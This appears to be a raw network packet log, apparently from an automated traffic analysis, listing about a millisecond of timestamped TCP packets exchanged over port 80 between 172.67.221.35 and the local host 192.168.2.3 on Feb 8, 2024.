                                                                                                                                                                    Feb 8, 2024 19:08:50.011377096 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011389017 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011396885 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011401892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011416912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011418104 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011430025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011442900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011447906 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011457920 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011471033 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011485100 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011511087 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012001038 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012013912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012026072 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012039900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012048960 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012054920 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012068987 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012084961 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012113094 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012320995 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012336016 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012348890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012362003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012372017 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012377977 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012393951 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012407064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012408018 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012439013 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012450933 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012470961 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012484074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012495995 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012509108 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012521982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012536049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012547970 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012547970 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012550116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012563944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012569904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012577057 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012590885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012604952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012614965 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012619019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012636900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012644053 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012650013 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012661934 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.012665033 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.012691975 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013253927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013267040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013278961 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013292074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013303995 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013314009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013318062 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013330936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013343096 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013345957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013360023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013375044 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013377905 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013390064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013400078 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013402939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013417006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013430119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013431072 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013464928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013470888 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013478994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013490915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013503075 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013505936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013521910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013534069 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013535023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013550043 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013561010 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.013565063 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.013601065 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014271975 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014286995 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014298916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014312029 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014324903 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014328003 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014337063 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014349937 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014364004 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014365911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014379978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014391899 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014393091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014406919 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014422894 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014431000 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014439106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014452934 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014461994 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014467955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014481068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014482021 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014493942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014508009 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014512062 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014522076 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014542103 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014545918 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014552116 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.014558077 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014573097 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.014600992 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015017986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015032053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015068054 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015193939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015208006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015221119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015235901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015238047 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015249014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015260935 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015263081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015276909 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015290022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015295029 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015304089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015314102 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015317917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015331984 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015347004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015351057 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015361071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015373945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015377045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015388012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015403032 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015404940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015417099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015429974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015430927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015451908 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015455961 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.015467882 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.015490055 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016040087 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016053915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016067028 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016082048 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016088963 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016097069 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016109943 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016110897 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016140938 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016146898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016160011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016172886 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016185045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016186953 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016201019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016211987 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016216040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016230106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016238928 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016243935 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016258955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016267061 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016273975 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016289949 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016297102 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016304016 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016316891 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016329050 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016331911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016346931 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016356945 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016360998 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016386032 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016902924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016917944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016931057 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016943932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016953945 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.016959906 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.016973972 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017003059 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017056942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017160892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017174959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017200947 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017208099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017224073 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017246962 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017379045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017393112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017405033 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017417908 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017429113 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017432928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017446041 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017448902 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017460108 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017472982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017478943 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017486095 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017498016 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017503023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017515898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017529964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017533064 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017544985 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017553091 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017559052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017573118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017581940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017586946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017602921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.017617941 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017646074 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.017735958 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018120050 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018134117 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018146038 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018161058 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018172026 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018177032 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018193960 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018224955 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018354893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018368959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018381119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018394947 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018410921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018424988 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018441916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018449068 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018455029 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018469095 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018482924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018497944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018505096 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018505096 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018505096 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018512964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018521070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018532038 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018533945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018548965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018563032 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018572092 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018572092 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.018578053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.018615007 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019018888 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019032955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019047022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019062996 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019068003 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019098043 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019119024 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019134045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019146919 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019157887 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019160986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019185066 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019243002 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019257069 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019268990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019283056 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019292116 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019296885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019310951 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019314051 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019325018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019331932 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019337893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019351959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019361973 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019366980 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019381046 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019396067 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019397974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019411087 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019429922 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.019433022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.019454002 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.020001888 CET8049717172.67.221.35192.168.2.3
